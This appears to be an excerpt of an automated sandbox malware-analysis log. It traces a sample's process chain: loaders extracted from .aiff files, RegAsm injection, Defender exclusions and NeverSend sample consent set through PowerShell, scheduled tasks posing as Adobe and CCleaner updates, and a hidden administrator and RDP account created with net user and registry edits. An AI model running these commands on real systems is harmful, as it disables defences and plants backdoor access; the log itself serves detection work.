              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\autC3EF.tmp
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
              Source: 8lOT1rXZp5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 8lOT1rXZp5.exeVirustotal: Detection: 53%
              Source: 8lOT1rXZp5.exeReversingLabs: Detection: 52%
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeFile read: C:\Users\user\Desktop\8lOT1rXZp5.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\8lOT1rXZp5.exe "C:\Users\user\Desktop\8lOT1rXZp5.exe"
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeProcess created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\System32\makecab.exe"
              Source: C:\Windows\SysWOW64\makecab.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com Rifiutare.exe.com D
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com Uno.exe.com f
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com Inebriato.exe.com R
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic group where sid="S-1-5-32-555" get name /value
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user fsUIwEqMAc zyTFxcsIkA /add
              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user fsUIwEqMAc zyTFxcsIkA /add
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup Administrators fsUIwEqMAc /add
              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup Administrators fsUIwEqMAc /add
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic group where sid="S-1-5-32-555" get name /value
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" fsUIwEqMAc /add
              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" fsUIwEqMAc /add
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net accounts /maxpwage:unlimited
              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 accounts /maxpwage:unlimited
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fsUIwEqMAc /t REG_DWORD /d "00000000" /f
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeProcess created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\System32\makecab.exe" Jump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiffJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmdJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com Rifiutare.exe.com DJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com Uno.exe.com fJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com Inebriato.exe.com RJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com DJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com fJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com RJump to behavior
